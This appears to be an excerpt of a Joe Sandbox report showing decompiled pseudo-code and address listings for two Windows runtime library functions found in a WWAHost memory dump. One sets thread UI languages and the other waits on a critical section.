                                              0x039829e6
                                              0x039829e9
                                              0x039829eb
                                              0x039829ed
                                              0x039829f3
                                              0x039829f5
                                              0x039829f8
                                              0x039829fa
                                              0x03982a97
                                              0x03982a9a
                                              0x03982a9d
                                              0x03982add
                                              0x00000000
                                              0x03982a9f
                                              0x03982aa2
                                              0x03982aa5
                                              0x03982aa8
                                              0x03982aab
                                              0x039c5cab
                                              0x039c5caf
                                              0x039c5cc5
                                              0x039c5cda
                                              0x039c5cdc
                                              0x039c5cdf
                                              0x039c5ce5
                                              0x00000000
                                              0x039c5ceb
                                              0x039c5ced
                                              0x039c5cee
                                              0x00000000
                                              0x039c5cee
                                              0x039c5cb1
                                              0x039c5cb4
                                              0x039c5cb9
                                              0x039c5cbb
                                              0x00000000
                                              0x039c5cbd
                                              0x039c5cbd
                                              0x00000000
                                              0x039c5cbd
                                              0x039c5cbb
                                              0x03982ab1
                                              0x03982ab1
                                              0x03982ac4
                                              0x03982ac6
                                              0x03982ac6
                                              0x00000000
                                              0x03982ac6
                                              0x03982aab
                                              0x00000000
                                              0x03982a00
                                              0x03982a09
                                              0x03982a0e
                                              0x03982a21
                                              0x03982a24
                                              0x03982a35
                                              0x03982a3a
                                              0x03982a3d
                                              0x03982a42
                                              0x03982a59
                                              0x03982a59
                                              0x03982a5c
                                              0x03982a5f
                                              0x03982a5f
                                              0x039829fa
                                              0x039829f3
                                              0x03982a64
                                              0x03982a64
                                              0x03982a6b
                                              0x03982a6b
                                              0x03982a6d
                                              0x03982a72
                                              0x03982a72
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PATH
                                              • API String ID: 0-1036084923
                                              • Opcode ID: 86100068ccd01f10f48c3ed95ab820718678cc5fd75559bea9435918c958d982
                                              • Instruction ID: 450f5dadeb57019551b37f8946cca05bfbbee7fdcc2013b15f79e4c4d8daff6b
                                              • Opcode Fuzzy Hash: 86100068ccd01f10f48c3ed95ab820718678cc5fd75559bea9435918c958d982
                                              • Instruction Fuzzy Hash: 74C19275D10219EFCB15EF99D880BBDF7B5FF88740F48482AE851AB250D735A942CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0398FAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 80%
                                              			E0398FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0396EEF0(0x3a47b60);
					_t134 =  *0x3a47b84; // 0x77577b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x3a47b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x3a47b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E03966D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E039676E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E039F8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0395B150();
													}
													_t116 = E039F6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E039675CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x3a48638; // 0x0
																	_t122 = L039638A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E039676E2(_t154);
																			goto L41;
																		}
																	} else {
																		E039676E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0398FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L039670F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0398FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0398FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0398FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0398FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0398FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x3a47b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x3a47b84 = _t75;
						_t73 = E0396EB70(_t134, 0x3a47b60);
						if( *0x3a47b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0396FF60( *0x3a47b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                              0x0398fab0
                                              0x0398fab2
                                              0x0398fab3
                                              0x0398fab4
                                              0x0398fabc
                                              0x0398fac0
                                              0x0398fb14
                                              0x0398fb17
                                              0x0398fac2
                                              0x0398fac8
                                              0x0398facd
                                              0x0398fad3
                                              0x0398fad3
                                              0x0398fadd
                                              0x0398fb18
                                              0x0398fb1b
                                              0x0398fb1d
                                              0x0398fb1e
                                              0x0398fb1f
                                              0x0398fb20
                                              0x0398fb21
                                              0x0398fb22
                                              0x0398fb23
                                              0x0398fb24
                                              0x0398fb25
                                              0x0398fb26
                                              0x0398fb27
                                              0x0398fb28
                                              0x0398fb29
                                              0x0398fb2a
                                              0x0398fb2b
                                              0x0398fb2c
                                              0x0398fb2d
                                              0x0398fb2e
                                              0x0398fb2f
                                              0x0398fb3a
                                              0x0398fb3b
                                              0x0398fb3e
                                              0x0398fb41
                                              0x0398fb44
                                              0x0398fb47
                                              0x0398fb4a
                                              0x0398fb4d
                                              0x0398fb53
                                              0x039cbdcb
                                              0x039cbdcb
                                              0x0398fb59
                                              0x0398fb5b
                                              0x0398fb5b
                                              0x0398fb5e
                                              0x039cbdd5
                                              0x039cbdd8
                                              0x00000000
                                              0x039cbdda
                                              0x00000000
                                              0x039cbdda
                                              0x0398fb64
                                              0x0398fb64
                                              0x0398fb64
                                              0x0398fb67
                                              0x0398fb6e
                                              0x0398fb70
                                              0x0398fb72
                                              0x00000000
                                              0x0398fb78
                                              0x0398fb7a
                                              0x0398fb7a
                                              0x0398fb7d
                                              0x0398fb80
                                              0x039cbddf
                                              0x039cbde1
                                              0x00000000
                                              0x039cbde3
                                              0x00000000
                                              0x039cbde3
                                              0x0398fb86
                                              0x0398fb86
                                              0x0398fb86
                                              0x0398fb8b
                                              0x0398fb90
                                              0x0398fb92
                                              0x0398fb94
                                              0x0398fb9a
                                              0x0398fb9b
                                              0x0398fba1
                                              0x039cbde8
                                              0x039cbdeb
                                              0x039cbded
                                              0x039cbeb5
                                              0x039cbeb5
                                              0x039cbebb
                                              0x039cbebd
                                              0x039cbec3
                                              0x039cbed2
                                              0x039cbedd
                                              0x039cbedd
                                              0x039cbeed
                                              0x00000000
                                              0x039cbdf3
                                              0x039cbdfe
                                              0x039cbe06
                                              0x039cbe0b
                                              0x039cbe0d
                                              0x039cbe0f
                                              0x039cbe14
                                              0x039cbe19
                                              0x039cbe20
                                              0x039cbe25
                                              0x039cbe27
                                              0x039cbe35
                                              0x039cbe39
                                              0x039cbe46
                                              0x039cbe4f
                                              0x039cbe54
                                              0x039cbe56
                                              0x039cbef8
                                              0x039cbef8
                                              0x00000000
                                              0x039cbe5c
                                              0x039cbe5c
                                              0x039cbe60
                                              0x00000000
                                              0x039cbe66
                                              0x039cbe66
                                              0x039cbe7f
                                              0x039cbe84
                                              0x039cbe87
                                              0x039cbe89
                                              0x039cbe8b
                                              0x039cbe99
                                              0x039cbe9d
                                              0x039cbea0
                                              0x039cbeac
                                              0x039cbeaf
                                              0x039cbeb1
                                              0x039cbeb3
                                              0x039cbeb3
                                              0x00000000
                                              0x039cbea2
                                              0x039cbea2
                                              0x00000000
                                              0x039cbea2
                                              0x039cbe8d
                                              0x039cbe8d
                                              0x039cbe92
                                              0x00000000
                                              0x039cbe92
                                              0x039cbe8b
                                              0x039cbe60
                                              0x039cbe3b
                                              0x039cbe3b
                                              0x039cbe3e
                                              0x00000000
                                              0x039cbe40
                                              0x039cbe40
                                              0x039cbe44
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039cbe44
                                              0x039cbe3e
                                              0x039cbe29
                                              0x039cbe29
                                              0x00000000
                                              0x039cbe29
                                              0x039cbe27
                                              0x00000000
                                              0x0398fba7
                                              0x0398fba7
                                              0x0398fbab
                                              0x039cbf02
                                              0x0398fbb1
                                              0x0398fbb1
                                              0x0398fbb8
                                              0x0398fbbd
                                              0x0398fbbd
                                              0x0398fbbf
                                              0x0398fbbf
                                              0x0398fbc5
                                              0x0398fbcb
                                              0x0398fbf8
                                              0x0398fbf8
                                              0x0398fbfa
                                              0x00000000
                                              0x0398fc00
                                              0x0398fc00
                                              0x0398fc03
                                              0x00000000
                                              0x0398fc09
                                              0x0398fc09
                                              0x0398fc0f
                                              0x0398fc15
                                              0x0398fc23
                                              0x0398fc23
                                              0x0398fc25
                                              0x0398fc27
                                              0x0398fc75
                                              0x0398fc7c
                                              0x0398fc84
                                              0x00000000
                                              0x0398fc29
                                              0x0398fc29
                                              0x0398fc2d
                                              0x0398fc30
                                              0x039cbf0f
                                              0x00000000
                                              0x0398fc36
                                              0x0398fc38
                                              0x0398fc3b
                                              0x0398fc41
                                              0x039cbf17
                                              0x039cbf19
                                              0x039cbf48
                                              0x039cbf4b
                                              0x00000000
                                              0x039cbf1b
                                              0x039cbf22
                                              0x039cbf24
                                              0x039cbf26
                                              0x00000000
                                              0x039cbf2c
                                              0x039cbf37
                                              0x039cbf39
                                              0x039cbf3b
                                              0x00000000
                                              0x039cbf41
                                              0x039cbf41
                                              0x039cbf41
                                              0x039cbf41
                                              0x039cbf45
                                              0x00000000
                                              0x039cbf45
                                              0x039cbf3b
                                              0x039cbf26
                                              0x00000000
                                              0x0398fc47
                                              0x0398fc47
                                              0x0398fc49
                                              0x0398fcb2
                                              0x0398fcb4
                                              0x0398fcb6
                                              0x0398fcdc
                                              0x0398fcdc
                                              0x00000000
                                              0x0398fcb8
                                              0x0398fcc3
                                              0x0398fcc5
                                              0x0398fcc7
                                              0x00000000
                                              0x0398fcc9
                                              0x0398fcc9
                                              0x0398fccd
                                              0x00000000
                                              0x0398fccd
                                              0x0398fcc7
                                              0x00000000
                                              0x0398fc4b
                                              0x0398fc4b
                                              0x0398fc4e
                                              0x0398fc4e
                                              0x0398fc51
                                              0x0398fc51
                                              0x0398fc54
                                              0x0398fc5a
                                              0x0398fc5c
                                              0x0398fc5f
                                              0x0398fc61
                                              0x0398fc63
                                              0x0398fc65
                                              0x0398fc67
                                              0x0398fc6e
                                              0x0398fc72
                                              0x0398fc72
                                              0x0398fc72
                                              0x0398fc72
                                              0x0398fc67
                                              0x0398fc61
                                              0x00000000
                                              0x0398fc5a
                                              0x0398fc49
                                              0x0398fc41
                                              0x0398fc30
                                              0x0398fc27
                                              0x0398fc03
                                              0x0398fbcd
                                              0x0398fbd3
                                              0x0398fbd9
                                              0x0398fbdc
                                              0x0398fbde
                                              0x0398fc99
                                              0x0398fc9b
                                              0x0398fc9d
                                              0x0398fcd5
                                              0x0398fcd5
                                              0x0398fc89
                                              0x0398fc89
                                              0x00000000
                                              0x0398fc9f
                                              0x0398fc9f
                                              0x0398fca3
                                              0x00000000
                                              0x0398fca3
                                              0x00000000
                                              0x0398fbe4
                                              0x0398fbe4
                                              0x0398fbe4
                                              0x0398fbe4
                                              0x0398fbe9
                                              0x0398fbf2
                                              0x00000000
                                              0x0398fbf2
                                              0x0398fbde
                                              0x0398fbcb
                                              0x0398fbab
                                              0x0398fc8b
                                              0x0398fc8b
                                              0x0398fc8c
                                              0x0398fb80
                                              0x0398fb72
                                              0x0398fb5e
                                              0x0398fc8d
                                              0x0398fc91
                                              0x0398fadf
                                              0x0398fadf
                                              0x0398fae1
                                              0x0398fae4
                                              0x0398fae7
                                              0x0398faec
                                              0x0398faf8
                                              0x0398fb00
                                              0x0398fb07
                                              0x0398fb0f
                                              0x0398fb0f
                                              0x0398fb07
                                              0x00000000
                                              0x0398faf8
                                              0x0398fadd

                                              Strings
                                              • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 039CBE0F
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                              • API String ID: 0-865735534
                                              • Opcode ID: cbf08550d1f07720b85463379b2da90ee30aec92ca7c2810642ca18a5cab58b6
                                              • Instruction ID: aa868f02cc5bcd704a3a494261d45c7db6706b9b1cf4f5c46413e174a1df72e2
                                              • Opcode Fuzzy Hash: cbf08550d1f07720b85463379b2da90ee30aec92ca7c2810642ca18a5cab58b6
                                              • Instruction Fuzzy Hash: 85A11376B10746CBDB25EF68D450B7AB3A8AFC8750F0849ADE907DB680DB30D941CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03952D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 63%
                                              			E03952D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x3a45350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x3a47bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E039997C0();
				}
				if( *0x3a479c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x3a479c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E03981624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E03977D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E039EFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E03999520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0398E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L039ADF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x3a46901;
								_push(_t109);
								_v52 = _t98;
								if( *0x3a46901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E03999980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E039995D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E03977D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E03977D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E039D7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E039EFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x3a45350;
							if(_t109 != 0x3a45350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E039EFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E039E5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                              0x03952d8a
                                              0x03952d8a
                                              0x03952d92
                                              0x03952d96
                                              0x03952d9e
                                              0x03952da0
                                              0x03952da3
                                              0x03952da5
                                              0x03952da8
                                              0x03952dab
                                              0x03952db2
                                              0x039af9aa
                                              0x039af9ab
                                              0x039af9ae
                                              0x039af9ae
                                              0x03952db8
                                              0x03952dc2
                                              0x039af9b9
                                              0x039af9be
                                              0x039af9bf
                                              0x039af9bf
                                              0x03952dcf
                                              0x039af9c9
                                              0x03952dd5
                                              0x03952dd5
                                              0x03952dd5
                                              0x03952dde
                                              0x03952de1
                                              0x03952e70
                                              0x03952e72
                                              0x03952e72
                                              0x03952de7
                                              0x03952deb
                                              0x03952e7c
                                              0x03952e83
                                              0x03952e85
                                              0x03952e8b
                                              0x03952e8d
                                              0x03952e92
                                              0x03952e92
                                              0x03952e85
                                              0x03952df1
                                              0x03952df7
                                              0x03952df9
                                              0x03952df9
                                              0x03952dfc
                                              0x03952dff
                                              0x03952e02
                                              0x00000000
                                              0x03952e05
                                              0x03952e0c
                                              0x039af9d9
                                              0x03952e12
                                              0x03952e12
                                              0x03952e12
                                              0x03952e1a
                                              0x039af9e3
                                              0x039af9e9
                                              0x039af9f0
                                              0x039af9f6
                                              0x039af9f8
                                              0x039af9f8
                                              0x039af9f0
                                              0x03952e23
                                              0x039afa02
                                              0x039afa03
                                              0x039afa05
                                              0x039afa06
                                              0x00000000
                                              0x03952e29
                                              0x03952e29
                                              0x03952e2e
                                              0x03952e34
                                              0x03952e3e
                                              0x00000000
                                              0x00000000
                                              0x03952e44
                                              0x03952e47
                                              0x03952e4d
                                              0x00000000
                                              0x00000000
                                              0x03952e4f
                                              0x03952e54
                                              0x00000000
                                              0x00000000
                                              0x03952e5a
                                              0x03952e5f
                                              0x03952e9a
                                              0x03952ea4
                                              0x03952ea5
                                              0x03952ea8
                                              0x03952eaf
                                              0x03952eb2
                                              0x03952eb5
                                              0x039afae9
                                              0x039afaeb
                                              0x039afaed
                                              0x039afaef
                                              0x039afaf7
                                              0x039afaf8
                                              0x039afafd
                                              0x039afaff
                                              0x039afb04
                                              0x039afb04
                                              0x039afaff
                                              0x03952ec0
                                              0x03952ec4
                                              0x03952ec6
                                              0x03952ec8
                                              0x039afb14
                                              0x039afb18
                                              0x039afb1e
                                              0x039afb21
                                              0x039afb21
                                              0x03952ece
                                              0x03952ece
                                              0x03952ece
                                              0x03952ed7
                                              0x03952e61
                                              0x03952e63
                                              0x039afa6b
                                              0x039afa71
                                              0x039afa76
                                              0x039afa78
                                              0x039afa8a
                                              0x039afa7a
                                              0x039afa83
                                              0x039afa83
                                              0x039afa8f
                                              0x039afa91
                                              0x039afa97
                                              0x039afa9d
                                              0x039afaa4
                                              0x039afaaa
                                              0x039afaaf
                                              0x039afab1
                                              0x039afac3
                                              0x039afab3
                                              0x039afabc
                                              0x039afabc
                                              0x039afac8
                                              0x039afacb
                                              0x039afadf
                                              0x039afadf
                                              0x039afacb
                                              0x039afaa4
                                              0x039afa91
                                              0x03952e6f
                                              0x03952e6f
                                              0x03952e5f
                                              0x039afa13
                                              0x039afa15
                                              0x039afa17
                                              0x039afa1f
                                              0x039afa21
                                              0x039afa22
                                              0x039afa25
                                              0x039afa28
                                              0x039afa2f
                                              0x039afa2f
                                              0x039afa2a
                                              0x039afa2a
                                              0x039afa2a
                                              0x039afa31
                                              0x039afa34
                                              0x039afa36
                                              0x039afa3c
                                              0x039afa3e
                                              0x039afa41
                                              0x039afa43
                                              0x039afa45
                                              0x039afa45
